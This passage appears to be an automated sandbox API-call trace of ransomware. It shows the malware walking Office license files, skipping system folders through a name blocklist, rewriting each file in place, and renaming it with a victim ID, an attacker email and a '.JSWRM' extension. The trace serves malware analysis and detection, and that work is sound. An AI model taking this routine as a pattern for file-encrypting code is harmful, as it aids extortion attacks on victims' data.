dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0106.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0106.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0106.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0106.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0106.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.090] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial4-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial4-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial4-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0106.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0106.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0106.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.091] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe736bc4d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe736bc4d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7450ad3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5d23, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", cAlternateFileName="O385C6~1.XRM")) returned 1 [0106.091] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", lpString2=".") returned 1 [0106.091] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", lpString2="..") returned 1 [0106.091] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", lpString2="...") returned 1 [0106.091] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", lpString2="windows") returned -1 [0106.091] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.091] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.091] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.091] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.091] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.091] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0106.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0106.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0106.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0106.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0106.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0106.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d298, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0106.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0106.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0106.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0106.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0106.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial4-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.092] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23843) returned 1 [0106.092] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5d20) returned 0x24c1d0 [0106.092] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5d20, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5d20, lpOverlapped=0x0) returned 1 [0106.096] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.096] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5d20, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5d20, lpOverlapped=0x0) returned 1 [0106.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.096] CloseHandle (hObject=0x45c) returned 1 [0106.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0106.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0106.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0106.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0106.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0106.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0106.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.097] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial4-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial4-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial4-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0106.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0106.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0106.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.098] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7581d3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7581d3d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe768ce3a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d87, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", cAlternateFileName="O3CFE3~1.XRM")) returned 1 [0106.098] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.098] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.098] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.098] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.098] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.098] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.098] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.098] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.098] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.098] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0106.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0106.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0106.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0106.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0106.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0106.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0106.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0106.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0106.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0106.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0106.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial4-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.099] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11655) returned 1 [0106.099] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0106.099] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0106.101] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.101] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0106.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.101] CloseHandle (hObject=0x45c) returned 1 [0106.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0106.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0106.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0106.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0106.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0106.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0106.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.102] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial4-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial4-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0106.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0106.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0106.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.103] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7725736, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7725736, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe783081d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial5-pl.xrm-ms", cAlternateFileName="O35C30~1.XRM")) returned 1 [0106.103] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-pl.xrm-ms", lpString2=".") returned 1 [0106.103] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-pl.xrm-ms", lpString2="..") returned 1 [0106.103] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-pl.xrm-ms", lpString2="...") returned 1 [0106.103] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-pl.xrm-ms", lpString2="windows") returned -1 [0106.103] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-pl.xrm-ms", lpString2="recovery") returned -1 [0106.103] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.103] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.103] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.103] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.103] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-pl.xrm-ms", lpString2="msocache") returned 1 [0106.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0106.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial5-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0106.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial5-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0106.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0106.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0106.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial5-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0106.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial5-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0106.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0106.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0106.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0106.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0106.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial5-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.104] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0106.104] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0106.104] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, 